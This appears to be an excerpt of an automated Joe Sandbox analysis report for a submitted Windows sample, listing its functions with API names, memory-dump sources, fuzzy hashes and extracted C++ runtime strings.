                              control_flow_graph 0 7ff733aa9550-7ff733aa955a 1 7ff733aa9578-7ff733aa957b 0->1 2 7ff733aa955c-7ff733aa955f 0->2 5 7ff733aa9581-7ff733aa9584 1->5 6 7ff733aa9660-7ff733aa9686 AddVectoredExceptionHandler 1->6 3 7ff733aa9630-7ff733aa963a 2->3 4 7ff733aa9565-7ff733aa9572 2->4 3->4 8 7ff733aa9640-7ff733aa9651 RemoveVectoredExceptionHandler 3->8 5->4 7 7ff733aa9586-7ff733aa958f 5->7 7->4 9 7ff733aa9591-7ff733aa959d TlsGetValue 7->9 8->4 9->4 10 7ff733aa959f-7ff733aa95ab 9->10 11 7ff733aa95b1-7ff733aa95bb 10->11 12 7ff733aa9690-7ff733aa969c 10->12 13 7ff733aa95c2-7ff733aa95c9 11->13 14 7ff733aa95bd call 7ff733aa9270 11->14 15 7ff733aa9700-7ff733aa9703 12->15 16 7ff733aa969e-7ff733aa96a1 12->16 22 7ff733aa95e7-7ff733aa95ea call 7ff733aa86e0 13->22 23 7ff733aa95cb-7ff733aa95db CloseHandle 13->23 14->13 17 7ff733aa9705-7ff733aa9716 CloseHandle call 7ff733aa86e0 15->17 18 7ff733aa9738-7ff733aa9740 call 7ff733aa86e0 15->18 20 7ff733aa96a3 CloseHandle 16->20 21 7ff733aa96a9-7ff733aa96c5 16->21 31 7ff733aa971b-7ff733aa9726 call 7ff733aa8850 17->31 18->31 20->21 26 7ff733aa96c7 call 7ff733aa9270 21->26 27 7ff733aa96cc-7ff733aa96d0 21->27 35 7ff733aa95ef-7ff733aa95fa call 7ff733aa8850 22->35 28 7ff733aa95df-7ff733aa95e3 23->28 29 7ff733aa95dd CloseHandle 23->29 26->27 27->18 34 7ff733aa96d2-7ff733aa96df 27->34 28->22 29->28 43 7ff733aa974f-7ff733aa9755 call 7ff733aa8bd0 31->43 45 7ff733aa9728-7ff733aa9730 31->45 34->22 38 7ff733aa96e5-7ff733aa96fb CloseHandle call 7ff733aa86e0 34->38 35->43 44 7ff733aa9600-7ff733aa9610 35->44 38->35 47 7ff733aa9742-7ff733aa974a call 7ff733aa8ed0 44->47 48 7ff733aa9616-7ff733aa9624 TlsSetValue 44->48 45->4 47->43 48->4
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CloseHandleValue$ExceptionHandlerRemoveVectored
                              • String ID:
                              • API String ID: 2941551293-0
                              • Opcode ID: 93340cfc2f6e7b81882a54d0aa6e5e15fe5bba288095d26f90aca84e8af54d8d
                              • Instruction ID: 4a559566d32d566895551da86d65362d6dd33c82f68d3e4a9f3ca76b939a7616
                              • Opcode Fuzzy Hash: 93340cfc2f6e7b81882a54d0aa6e5e15fe5bba288095d26f90aca84e8af54d8d
                              • Instruction Fuzzy Hash: B1519326E0D60661FAF5BF209410B78A394EF44B65F840239EE2D362D0DF3CE485E2B1
                              Function 00007FF733A91180 Relevance: 12.1, APIs: 8, Instructions: 138sleepstringCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: malloc$ExceptionFilterSleepUnhandled_set_invalid_parameter_handlermemcpystrlen
                              • String ID:
                              • API String ID: 959198572-0
                              • Opcode ID: 5cac6035808fc1122b6d543a42663d4b77a0992895c3b0c80480b9e0ccb1a1a6
                              • Instruction ID: 3fb8a90f4d052ecab3812beb14c8eaf399f9ddadbeb1e270578f94ebdfa25505
                              • Opcode Fuzzy Hash: 5cac6035808fc1122b6d543a42663d4b77a0992895c3b0c80480b9e0ccb1a1a6
                              • Instruction Fuzzy Hash: 74514832A09606A1FAB0BB19E850A79A2A1EF487C1FC45435ED5C777A1DE2CF841A361
                              Function 00007FF733B40280 Relevance: 9.3, APIs: 6, Instructions: 277COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,00007FF733B4EB50,?,?,?,?,?,00007FF733B40155), ref: 00007FF733B402E8
                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,00007FF733B4EB50), ref: 00007FF733B40356
                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,00007FF733B4EB50), ref: 00007FF733B403B1
                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF733B40567
                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF733B405D9
                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF733B40638
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __acrt_iob_func
                              • String ID:
                              • API String ID: 711238415-0
                              • Opcode ID: 181a914ad925288a086578f6e5363b700f9112446dee31b0709b424643b7b027
                              • Instruction ID: 06a841ef4fc1df9d02200dc44c5c80993057674fc90e9075616a0a1960970b11
                              • Opcode Fuzzy Hash: 181a914ad925288a086578f6e5363b700f9112446dee31b0709b424643b7b027
                              • Instruction Fuzzy Hash: F7E1E132A04B82A2E364DF21E5543AEB360FB58788F809226DBDD17791DF7CE1A4D345
                              Function 00007FF733AA9100 Relevance: 13.6, APIs: 9, Instructions: 93threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Current$Thread$Process$CreateDuplicateEventHandlePriorityValueabort
                              • String ID:
                              • API String ID: 1404136710-0
                              • Opcode ID: 68e01076c3eac187e6d3dbeaaedc5d8ee709a176bc3ded471e262e0e78a1f03a
                              • Instruction ID: a977a63c544cea1b2f03f37462c2bb15dddfd6c3d8ad33c4af2cf114b1098aee
                              • Opcode Fuzzy Hash: 68e01076c3eac187e6d3dbeaaedc5d8ee709a176bc3ded471e262e0e78a1f03a
                              • Instruction Fuzzy Hash: 9E319E72A0970196F7B0AF24A844769B7A4EF05BA9F840238DEAC173E4DF3CD044D760
                              Function 00007FF733AA99D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Value$__acrt_iob_funccalloc
                              • String ID: once %p is %d
                              • API String ID: 3061261147-95064319
                              • Opcode ID: 87677c1d83528bb79b813c3cef137ec8e97be9c7f0a59fcbfa91425a8bf2645f
                              • Instruction ID: 6a1aea6a185303dcad83e2b23372cfd8f090297e797aa1b822da77b15d583ecd
                              • Opcode Fuzzy Hash: 87677c1d83528bb79b813c3cef137ec8e97be9c7f0a59fcbfa91425a8bf2645f
                              • Instruction Fuzzy Hash: DB416533A0D70665FAF5BB15A500B79E294AF44780F944039FEAD27391EE3CE841E3A1
                              Function 00007FF733A919E0 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: wcscmp
                              • String ID:
                              • API String ID: 3392835482-0
                              • Opcode ID: 29ec912fc42efb23ee8c91740df00871e30f6d6beae4a92c8055c8c06ee2a4c0
                              • Instruction ID: c6384f3a3a6415f59f150729780fc62007251d754f3ae5cce555c02b32331533
                              • Opcode Fuzzy Hash: 29ec912fc42efb23ee8c91740df00871e30f6d6beae4a92c8055c8c06ee2a4c0
                              • Instruction Fuzzy Hash: 42416822F05B09ADFB60EAA5C8447ED27B5AB08788F804079EE4C77B99EF38D504C750
                              Function 00007FF733B4A2B0 Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF733B099C1,?,?,00000000,00007FF733B09528), ref: 00007FF733B4A2C7
                                • Part of subcall function 00007FF733B4A390: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,00007FF733B4B1C3,?,?,00000000,00000001,00007FF733ABC1F2,?,?,?,?,-00000008,?), ref: 00007FF733B4A3A0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: malloc
                              • String ID:
                              • API String ID: 2803490479-0
                              • Opcode ID: da31a7f397fc2a856fe08dabf4e807359348246bd7fdfbf6c4bf6be3cd5ba026
                              • Instruction ID: 147e0a2327a696c20f4ab19f8ca244af443879a7958a9e3d862522b74f5bee7c
                              • Opcode Fuzzy Hash: da31a7f397fc2a856fe08dabf4e807359348246bd7fdfbf6c4bf6be3cd5ba026
                              • Instruction Fuzzy Hash: DFF08C51E0A717B1FEF4B79564123B493409F48340F840834D98E263D2EE2DA450B23A

                              Non-executed Functions

                              Function 00007FF733AAAB60 Relevance: 38.0, APIs: 25, Instructions: 460sleepCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CreateEventSleep
                              • String ID:
                              • API String ID: 3100162736-0
                              • Opcode ID: 3f367b52d5fd9be015894532d3bf0a8bd2bc30661750352be08ff9d33ee83fa4
                              • Instruction ID: 0d1837924d88617a68470a3b821c6a7d70aa2e1c0c58ff8bb4942f5ea0188032
                              • Opcode Fuzzy Hash: 3f367b52d5fd9be015894532d3bf0a8bd2bc30661750352be08ff9d33ee83fa4
                              • Instruction Fuzzy Hash: 51027123E0964265FAF4BF249400BB9A2D4AF44B65F880635ED3D662D5DF3CE841E3A1
                              Function 00007FF733ABA6D0 Relevance: 21.4, APIs: 12, Strings: 2, Instructions: 363stringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: strlen$strcmp
                              • String ID: *$basic_string::append
                              • API String ID: 551667898-3732199748
                              • Opcode ID: 9b30d403674343c804f50bfd6696a790fbce8c5b24556c6821b9074ba1ebc17c
                              • Instruction ID: 2f893b294470e7c974073982dff7c710e5a890c4f1bc58b72ecab90a2f23a6e3
                              • Opcode Fuzzy Hash: 9b30d403674343c804f50bfd6696a790fbce8c5b24556c6821b9074ba1ebc17c
                              • Instruction Fuzzy Hash: 41E11626B08B46A1EBA0EF16C504B6EA791FB45FC4F848132EE5D27795CF3CE442A351
                              Function 00007FF733A9EC50 Relevance: 19.0, APIs: 7, Strings: 3, Instructions: 1492stringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: strlen
                              • String ID: !$5$inity
                              • API String ID: 39653677-42873854
                              • Opcode ID: 9044df35fda506a102288b7ef5463da4274886388011b3973f14793d6c198a7f
                              • Instruction ID: 946921c0c81bb8ad49c0cf05241100656e80a0d2e5873407085d2ff5d2c37b24
                              • Opcode Fuzzy Hash: 9044df35fda506a102288b7ef5463da4274886388011b3973f14793d6c198a7f
                              • Instruction Fuzzy Hash: C7E2E433A0C7869AE7B0AF15D440BAAF7A0FB85744F804235EA8D67794DF7CE444AB50
                              Function 00007FF733A9B920 Relevance: 15.4, APIs: 4, Strings: 6, Instructions: 351stringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: strlenstrncmp
                              • String ID: Z$Z$_$_$_$_GLOBAL_
                              • API String ID: 1310274236-662103887
                              • Opcode ID: 2b63f68fd3c8bc322f3d1037769bac45d746a728f5f64f5069c429d868fbaf7a
                              • Instruction ID: 228533fa495775a17fb015657e7ef6582e81cbafddf5705314ab63386dc15da2
                              • Opcode Fuzzy Hash: 2b63f68fd3c8bc322f3d1037769bac45d746a728f5f64f5069c429d868fbaf7a
                              • Instruction Fuzzy Hash: 70E1F472A1868AA9F7B09F3598447FD7BE1BB04748F844135EA5C3B789CF3C9641A720
                              Function 00007FF733B38ED0 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 319COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcpy$wcslen
                              • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
                              • API String ID: 1844840824-4063909124
                              • Opcode ID: 67e0190700b35762daf83bebf4101ed9cae92e6c0de8cbe1ac76f33a8687b230
                              • Instruction ID: a83b0ec099c1dfe2f83da5f0e25af15b0ba6b65a60ad679ed356b482dddab67d
                              • Opcode Fuzzy Hash: 67e0190700b35762daf83bebf4101ed9cae92e6c0de8cbe1ac76f33a8687b230
                              • Instruction Fuzzy Hash: 22A1E462B08A65A0EE60EF25D4001BCB321EB45FA4BC44632DE9D677D0CF3DE442E352
                              Function 00007FF733B3B600 Relevance: 10.8, APIs: 4, Strings: 3, Instructions: 264COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcpy
                              • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::basic_string$string::string
                              • API String ID: 3510742995-937311740
                              • Opcode ID: 842d41cc25cd2c0f35e917bdf2302a2e02a97b61e1ac9a1ba26afa6da861cc22
                              • Instruction ID: 9399be8054bddaa5793c0dec9c95386d33d93df9154dec6e0102993464532753
                              • Opcode Fuzzy Hash: 842d41cc25cd2c0f35e917bdf2302a2e02a97b61e1ac9a1ba26afa6da861cc22
                              • Instruction Fuzzy Hash: A781E522B04A65A5EA70EF15E8405A9F360FB08BE4FC84232EE8C5BB59DF3DD581D311
                              Function 00007FF733B3AB90 Relevance: 10.8, APIs: 4, Strings: 3, Instructions: 264COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: memcpy
                              • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::basic_string$string::string
                              • API String ID: 3510742995-937311740
                              • Opcode ID: 07aa0ae9fc0c94e9e5a75cb5ff968ab25b5a849a5e8a3c7356ad514edcd612b4
                              • Instruction ID: f6bb9758af47d19af09f8cfc9e6dd4ce15da819d68d7868fa7d35cbdb98f5248
                              • Opcode Fuzzy Hash: 07aa0ae9fc0c94e9e5a75cb5ff968ab25b5a849a5e8a3c7356ad514edcd612b4
                              • Instruction Fuzzy Hash: 1B81D463B05A61E5EA70AF15E8005A9F361FB48BE4FD84132EE8C5BB85EE3DD581D310
                              Function 00007FF733AA3210 Relevance: 10.4, APIs: 1, Strings: 5, Instructions: 1364COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2277297655.00007FF733A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733A90000, based on PE: true
                              • Associated: 00000000.00000002.2277280927.00007FF733A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277361429.00007FF733B4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277379585.00007FF733B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277406753.00007FF733B7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277422152.00007FF733B7F000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B82000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2277441442.00007FF733B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff733a90000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: $ $ $Infinity$NaN
                              • API String ID: 0-1214951648
